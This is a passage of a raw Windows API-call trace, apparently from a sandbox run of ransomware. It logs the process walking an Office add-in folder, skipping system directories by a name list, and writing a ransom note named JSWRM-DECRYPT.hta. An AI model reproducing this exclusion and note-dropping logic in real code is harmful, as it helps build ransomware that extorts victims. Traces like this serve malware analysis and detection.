lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.316] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bfa6d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.316] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0123.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0123.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244708 [0123.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0123.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.317] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bfa6d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0123.317] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0123.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244708 | out: hHeap=0x1e0000) returned 1 [0123.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.317] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2=".") returned 1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2="..") returned 1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2="...") returned 1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2="windows") returned -1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2="recovery") returned -1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2="perflogs") returned 1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2="documents and settings") returned 1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2="$RECYCLE.BIN") returned 1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2="system volume information") returned -1 [0123.317] lstrcmpiW (lpString1="pt-pt", lpString2="msocache") returned 1 [0123.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247990 [0123.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0123.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0123.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\pt-pt\\jswrm-decrypt.hta")) returned 0xffffffff [0123.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0123.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0123.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0123.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0123.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\pt-pt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.321] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.322] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.322] CloseHandle (hObject=0x338) returned 1 [0123.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0123.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2471d0 [0123.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0123.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0123.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\pt-pt\\jswrm-decrypt.hta")) returned 0x20 [0123.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0123.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.323] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pt-pt\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x402a58fe, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.323] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.323] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x402a58fe, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.323] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.323] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.323] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x402a58fe, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x402a58fe, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x402a58fe, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.323] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.323] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.323] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.323] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.323] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.323] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.323] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.323] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.323] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.324] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0123.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0123.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.324] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc70564d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc70564d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc72b8a6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.324] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.324] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e82eb0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.325] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4ba375b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4ba375b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.325] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.326] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63c7502, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63c7502, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf63c7502, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8c040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.326] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.326] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.326] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.326] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.326] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.326] lstrcmpiW 